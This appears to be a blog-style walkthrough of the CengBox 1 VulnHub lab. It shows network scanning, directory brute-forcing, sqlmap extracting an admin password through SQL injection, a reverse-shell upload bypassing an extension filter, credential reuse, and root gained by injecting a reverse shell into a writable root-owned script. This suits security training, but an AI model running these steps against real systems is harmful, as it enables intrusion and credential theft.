By, retrymp3 Instagram @retrymp3
Running netdiscover command to view the machine ip.
root@injmush:~# netdiscover
Currently scanning: 192.168.15.0/16 | Screen View: Unique Hosts
14 Captured ARP Req/Rep packets, from 4 hosts. Total size: 840 _____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
192.168.8.1 5c:a8:6a:d8:13:15 4 240 HUAWEI TECHNOLOGIES CO.,LTD
192.168.8.108 08:00:27:06:d2:43 7 420 PCS Systemtechnik GmbH
192.168.8.102 e8:d0:fc:87:53:03 2 120 Liteon Technology Corporation
192.168.8.100 54:b1:21:14:c0:a1 1 60 HUAWEI TECHNOLOGIES CO.,LTD
Services and port discovery
root@injmush:~/Desktop/vulnhub.vbox/cengbox1# nmap -sV -sC -T4 -oN nmap -vv 192.168.8.108
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5ESwv952eGqFVPnCkhAWI3AFXFLTEBiqTSfqvWjbrpDyTyawFvnOX+LthWfkf03mZiLbuy9R6bgvbPnrQSNmUTbA7DS3qyKgnFrt9yWYICS0w3dSsPvjFYoaqvCJdeIxdtFcYx/7sT+CbxlOMKnGhkibEUrK5Cwimnvfz2hKzf/TFXqAMaGRe86WgaxG+PsneZ75FVHGs9RoW13NTQdS7SK7ZGvcoqTrBcXfVKkUeV6SKei8B+ZdPTIcdxHO3y0q9ppchIkq1O8r3pF+9CyBUUrS4DLWVTGbRx50AJSRubM1aP7yXggRfNwJvks73v3i3b9yTcmzY3w+BXKyO2RsX
| 256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMpo8K6d/Y1jSAo6dzGCYJXvJtq4Vt7+9YItcucNoB74m9KqRGEsNw/3F8mkuIHKHfunBH6DoZE8m2gn/7XWCT0=
| 256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwn7OupbTb8M8pnpfOhzWoJ4KiLoM4bI39fNLGS7/XQ
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: CEng Company
MAC Address: 08:00:27:06:D2:43 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumerating port 80. Nothing interesting found.
So directory bruteforcing.
root@injmush:~/Desktop/vulnhub.vbox/cengbox1# ffuf -u http://192.168.8.108/FUZZ -w /usr/share/wordlists/dirb/big.txt -r -v
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/.htpasswd
* FUZZ: .htpasswd
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/.htaccess
* FUZZ: .htaccess
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/css
* FUZZ: css
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/img
* FUZZ: img
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/js
* FUZZ: js
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/masteradmin
* FUZZ: masteradmin
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/server-status
* FUZZ: server-status
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/uploads
* FUZZ: uploads
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/vendor
* FUZZ: vendor
Every directory is forbidden. Tried checking for other files in every one of these directories, and found a login page in masteradmin directory.
[Status: 200, Size: 0, Words: 1, Lines: 1]
| URL | http://192.168.8.108/masteradmin/db.php
* FUZZ: db.php
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/masteradmin/fonts
* FUZZ: fonts
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/masteradmin/images
* FUZZ: images
[Status: 403, Size: 278, Words: 20, Lines: 10]
| URL | http://192.168.8.108/masteradmin/js
* FUZZ: js
[Status: 200, Size: 5137, Words: 120, Lines: 108]
| URL | http://192.168.8.108/masteradmin/login.php
* FUZZ: login.php
[Status: 200, Size: 1440, Words: 171, Lines: 81]
| URL | http://192.168.8.108/masteradmin/upload.php
* FUZZ: upload.php
Played around with it and found the login page is vulnerable to sqli
So,
root@injmush:~/Desktop/vulnhub.vbox/cengbox1# sqlmap -u http://192.168.1.106/masteradmin/login.php — forms — dbs — batch
— forms(because it’s a login page)
— batch(answers the questions by default answer)
Got the database name
Now dumping all the data.
sqlmap -u http://192.168.1.106/masteradmin/login.php — forms -D cengbox — batch
[12:31:13] [INFO] fetching columns for table ‘admin’ in database ‘cengbox’
[12:31:13] [INFO] retrieved: 3
[12:31:16] [INFO] retrieved: id
[12:31:23] [INFO] retrieved: username
[12:31:46] [INFO] retrieved: password
[12:32:13] [INFO] fetching entries for table ‘admin’ in database ‘cengbox’
[12:32:13] [INFO] fetching number of entries for table ‘admin’ in database ‘cengbox’
[12:32:13] [INFO] retrieved: 1
[12:32:14] [WARNING] (case) time-based comparison requires reset of statistical model, please wait………………………… (done)
1
[12:32:17] [INFO] retrieved: C3ng0v3R00T1!
[12:33:07] [INFO] retrieved: masteradmin
Database: cengbox
Table: admin
[1 entry]
+ — — — + — — — — — — -+ — — — — — — — -+
| id | username | password |
+ — — — + — — — — — — -+ — — — — — — — -+
| 1 | masteradmin | C3ng0v3R00T1! |
+ — — — + — — — — — — -+ — — — — — — — -+
[12:33:39] [INFO] table ‘cengbox.`admin`’ dumped to CSV file ‘/root/.sqlmap/output/192.168.8.103/dump/cengbox/admin.csv’
Got the password, now logged in, and it goes to an upload.php page.
I could upload any file with .ceng extension. So renaming a php reverse shell and adding .ceng at the end and uploading it.
Started as a netcat listener, then went to upload folders on the website and opened the uploaded file.
Now I got a shell
Spawning a python shell to make it interactive.
python -c ‘import pty; pty.spawn (“/bin/bash”)’
Found there is a user named cengover so I tried su cengover and gave the passwd found from sqli.
Now I got the shell as user cengover
Checking around the machine, I found a hidden process running, by executing the linenum.sh script which i downloaded using wget command.
The running process was a python script which was executable by anyone whose owners were root. So I included a reverse shell inside the script and executed it after turning on a netcat listener on another terminal. Now I got a root shell.
cat ~/flag.txt.
